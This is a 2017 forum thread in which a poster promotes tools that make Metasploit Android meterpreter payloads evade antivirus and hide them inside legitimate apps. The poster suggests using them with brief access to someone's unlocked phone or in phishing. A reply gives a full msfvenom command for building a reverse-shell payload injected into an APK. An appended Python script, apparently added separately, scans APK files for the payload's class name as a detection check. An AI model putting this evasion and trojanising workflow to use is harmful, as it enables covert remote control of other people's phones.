n33dsh3llz Posted February 22, 2017

Hello everyone,

This weekend I got a little bored and began toying with Android payloads, just to toy with a meterpreter shell and see how it is. Upon doing so, I noticed the payload generated from msfvenom required me to ignore my AV to install. So this sent me down a path to bypass antivirus, which, come to find out, WAS EXTREMELY EASY!

I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload, that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone.

Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way than injecting the same AV-bypassing payload into a legit app? Well, some people had examples on how to do this online, but it required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss, so I allowed manual pieces for those special apps. The result was apkinjector, which, utilizing the apkwash technique of AV bypass, is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files.

Github:
https://github.com/jbreed/apkwash
https://github.com/jbreed/apkinjector
unlinkable Posted March 4, 2017

Hi, every time I'm trying to run the scripts this message appears: "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue." I run apt-get update &apt-get upgrade before the script. I'm using Kali Sana.
n33dsh3llz (Author) Posted March 4, 2017 (edited)

2 hours ago, unlinkable said:
> Hi, every time I'm trying to run the scripts this message appears: "An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue." I run apt-get update &apt-get upgrade before the script. I'm using Kali Sana.

What is happening is the script is seeing PayloadTrustManager.smali in the pulled-apart payload generated by MSFVenom. This payload has a signature detected by AVG that I haven't spent time avoiding. The quickest solution is to make sure you are completely updated. On Kali Rolling:

apt-get dist-upgrade
apt-get update
apt-get upgrade

Also, after spending a weekend throwing this together I realized the '-x' option on MSFVenom appears to get the job done as well for injecting into other apps. So if wanting to do a phishing attack, instead of using apkinjector you can use msfvenom with the apk to inject into followed by the -x option. Of course, the bash script is very similar to what msfvenom is doing, so looking it over will give you an understanding of what is happening, and if it is flagged by an AV you can simply modify the bash script to get around it.

msfvenom -p android/meterpreter/reverse_https LPORT=XXXX LHOST=X.X.X.X -x original.apk -o payload.apk

Edited March 4, 2017 by n33dsh3llz
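The reply above names PayloadTrustManager.smali as the artefact that gives the stock msfvenom Android payload away. As an added example (not code from the thread or from apkwash/apkinjector), the script below opens an APK as the zip archive it is and searches every .dex member for that class name, which is the kind of check a mobile AV or app-vetting pipeline performs. The indicator list and the in-memory sample archive are constructed for illustration; as the thread itself notes, apkwash rewrites the payload so that this plain string match only catches the unmodified msfvenom output.

```python
"""Flag APKs whose Dalvik bytecode references the msfvenom PayloadTrustManager class."""
import io
import zipfile

# Byte strings to look for inside classes.dex / classes2.dex / ...
# "PayloadTrustManager" is the class named in the thread; extend as needed.
INDICATORS = [b"PayloadTrustManager"]


def scan_apk_bytes(apk_bytes: bytes) -> dict:
    """Return {dex member name: [indicators found]} for members that match."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            # Only compiled Dalvik code is of interest; resources are skipped.
            if not info.filename.endswith(".dex"):
                continue
            data = zf.read(info)
            hits = [ind.decode() for ind in INDICATORS if ind in data]
            if hits:
                findings[info.filename] = hits
    return findings


def build_sample_apk(injected: bool) -> bytes:
    """Construct an in-memory stand-in APK (constructed data, not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", "<manifest/>")
        # Dex string pool entries use JVM-style descriptors: Lpackage/Class;
        body = b"Lcom/example/app/MainActivity;"
        if injected:
            body += b"\x00Lcom/example/app/PayloadTrustManager;"
        zf.writestr("classes.dex", b"dex\n035\x00" + body)
    return buf.getvalue()


if __name__ == "__main__":
    for label, flag in (("clean", False), ("injected", True)):
        print(label, scan_apk_bytes(build_sample_apk(flag)))
```

To scan a real file, pass `open("app.apk", "rb").read()` to `scan_apk_bytes`; a non-empty result means the archive still carries the stock payload class.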
n33dsh3llz (Author) Posted March 4, 2017

You also want to make sure your sources.list has the repo.
http://docs.kali.org/general-use/kali-linux-sources-list-repositories